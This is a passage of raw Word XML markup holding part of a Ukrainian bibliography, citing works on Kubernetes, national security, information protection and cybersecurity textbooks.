          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Гонтаренко С. С., Крайник Я. М. Процес розгортання кластерного застосунку в Kubernetes. Інформаційні технології та інженерія : тези доп.</w:t>
      </w:r>
      <w:r w:rsidR="00C95949">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C95949" w:rsidRPr="00C95949">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Всеукр. наук.-практ. конф. Миколаїв, 07–10 лют. 2023 р. Миколаїв : Чорном.</w:t>
      </w:r>
      <w:r w:rsidR="00C95949">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C95949" w:rsidRPr="00C95949">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>нац. ун-т ім. Петра Могили, 2023. С. 12–14</w:t>
      </w:r>
      <w:r w:rsidR="00C95949">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC54F7" w:rsidRDefault="00BC54F7" w:rsidP="00080E17">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16. </w:t>
      </w:r>
      <w:r w:rsidR="00080E17" w:rsidRPr="00080E17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Горбулін В. П. Системно-концептуальні засади стратегії</w:t>
      </w:r>
      <w:r w:rsidR="00080E17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00080E17" w:rsidRPr="00080E17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>національ-ної безпеки України / В. П. Горбулін, А. Б. Качинський. – К. :Євроатлан-тикінформ, 2007. – 592 с.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C95949" w:rsidRDefault="00C95949" w:rsidP="00080E17">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>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17. </w:t>
      </w:r>
      <w:r w:rsidR="00080E17" w:rsidRPr="00080E17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Мастяниця Й. І. Захист інформаційних ресурсів України:</w:t>
      </w:r>
      <w:r w:rsidR="00080E17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00080E17" w:rsidRPr="00080E17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>проблеми і шляхи їх розв’язання / Й. І. Мастяниця, О. В. Соснін, Л. Є.</w:t>
      </w:r>
      <w:r w:rsidR="00080E17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00080E17" w:rsidRPr="00080E17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Шиманський – К. : Національний інсти</w:t>
      </w:r>
      <w:r w:rsidR="00080E17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>тут стратегічних досліджень, 202</w:t>
      </w:r>
      <w:r w:rsidR="00080E17" w:rsidRPr="00080E17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>0.</w:t>
      </w:r>
      <w:r w:rsidR="00080E17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00080E17" w:rsidRPr="00080E17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>– 98 с.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C95949" w:rsidRDefault="00C95949" w:rsidP="00A538A7">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18. </w:t>
      </w:r>
      <w:r w:rsidR="00A538A7" w:rsidRPr="00A538A7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Грайворонський М.В. Безпека інформаційно-комунікаційних систем/М.В.Грайворонський, О.М.Новіков. </w:t>
      </w:r>
      <w:r w:rsidR="00964D26" w:rsidRPr="00080E17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00A538A7" w:rsidRPr="00A538A7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> К: Видавнича група BHV,</w:t>
      </w:r>
      <w:r w:rsidR="00A538A7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A538A7" w:rsidRPr="00A538A7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>2009. – 608 с</w:t>
      </w:r>
      <w:r w:rsidR="00A538A7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C95949" w:rsidRDefault="00C95949" w:rsidP="00A538A7">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19. </w:t>
      </w:r>
      <w:r w:rsidR="00A538A7" w:rsidRPr="00A538A7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Блаватська Н.М. Програмне забезпечення систем захисту інформації</w:t>
      </w:r>
      <w:r w:rsidR="00A538A7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A538A7" w:rsidRPr="00A538A7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>/ Н.М. Блаватська, В.Д. Козюра, В.О. Хорошко – К: Вид. ДУІКТ,</w:t>
      </w:r>
      <w:r w:rsidR="00A538A7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> 202</w:t>
      </w:r>
      <w:r w:rsidR="00A538A7" w:rsidRPr="00A538A7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>1. – 330 с.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C95949" w:rsidRPr="00964D26" w:rsidRDefault="00C95949" w:rsidP="00404F7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20. </w:t>
      </w:r>
      <w:r w:rsidR="00964D26" w:rsidRPr="00964D26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Pfitzmann B. Information Hiding Terminology</w:t>
      </w:r>
      <w:r w:rsidR="00964D26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00964D26" w:rsidRPr="00964D26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">/ Birgit Pfitzmann// [Information Hiding, </w:t>
      </w:r>
      <w:r w:rsidR="00964D26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>2019</w:t>
      </w:r>
      <w:r w:rsidR="00964D26" w:rsidRPr="00964D26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">], vol. 1174, pp. 347-350. – Mode of access: https://www.bibsonomy.org/bibtex/2a2a3c63d0ffb9905c76e9842a2419cbb/dblp </w:t>
      </w:r>
      <w:r w:rsidR="00964D26" w:rsidRPr="003C65DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>(Дата</w:t>
      </w:r>
      <w:r w:rsidR="00964D26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00964D26" w:rsidRPr="003C65DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>звернення: 1</w:t>
      </w:r>
      <w:r w:rsidR="00964D26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00964D26" w:rsidRPr="003C65DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r w:rsidR="00964D26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>1.2024</w:t>
      </w:r>
      <w:r w:rsidR="00964D26" w:rsidRPr="003C65DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C95949" w:rsidRDefault="00C95949" w:rsidP="00191CBC">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>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21. </w:t>
      </w:r>
      <w:r w:rsidR="00404F7B" w:rsidRPr="00EF1CD4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Рекомендації міжнародна союзу електрозв</w:t>
      </w:r>
      <w:r w:rsidR="00404F7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00404F7B" w:rsidRPr="00EF1CD4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>язку.</w:t>
      </w:r>
      <w:r w:rsidR="00404F7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> Мережі передачі даних, взаємозв’</w:t>
      </w:r>
      <w:r w:rsidR="00404F7B" w:rsidRPr="00EF1CD4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>язок відкритих мереж та</w:t>
      </w:r>
      <w:r w:rsidR="00404F7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00404F7B" w:rsidRPr="00EF1CD4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">безпека. Безпека кіберпростору – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00404F7B" w:rsidRPr="00EF1CD4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>кібербезпека</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00404F7B" w:rsidRPr="00EF1CD4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>. МСЕ-Х.1208 2014 року р. ISO/IEC 27000. Режим доступу: [б-ISO/IEC27000].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00404F7B" w:rsidRPr="000850ED" w:rsidRDefault="00C95949" w:rsidP="00404F7B">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind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22. </w:t>
      </w:r>
      <w:r w:rsidR="00404F7B" w:rsidRPr="000850ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Живило, Є.О. Захист інформації та </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00404F7B" w:rsidRPr="000850ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>кібербезпека</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00404F7B" w:rsidRPr="000850ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00404F7B" w:rsidRPr="000850ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>велектронних</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00404F7B" w:rsidRPr="000850ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> комунікаційних мережах : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00404F7B" w:rsidRPr="000850ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>навч</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00404F7B" w:rsidRPr="000850ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00404F7B" w:rsidRPr="000850ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>посіб</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00404F7B" w:rsidRPr="000850ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00404F7B" w:rsidRPr="000850ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Є.О.Живило</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00404F7B" w:rsidRPr="000850ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">.- Полтава : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00404F7B" w:rsidRPr="000850ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Нац</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00404F7B" w:rsidRPr="000850ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>. ун-т</w:t>
      </w:r>
      <w:r w:rsidR="00404F7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> ім. ю. Кондратюка, 2023.-188 с.;</w:t>
      </w:r>
    </w:p>
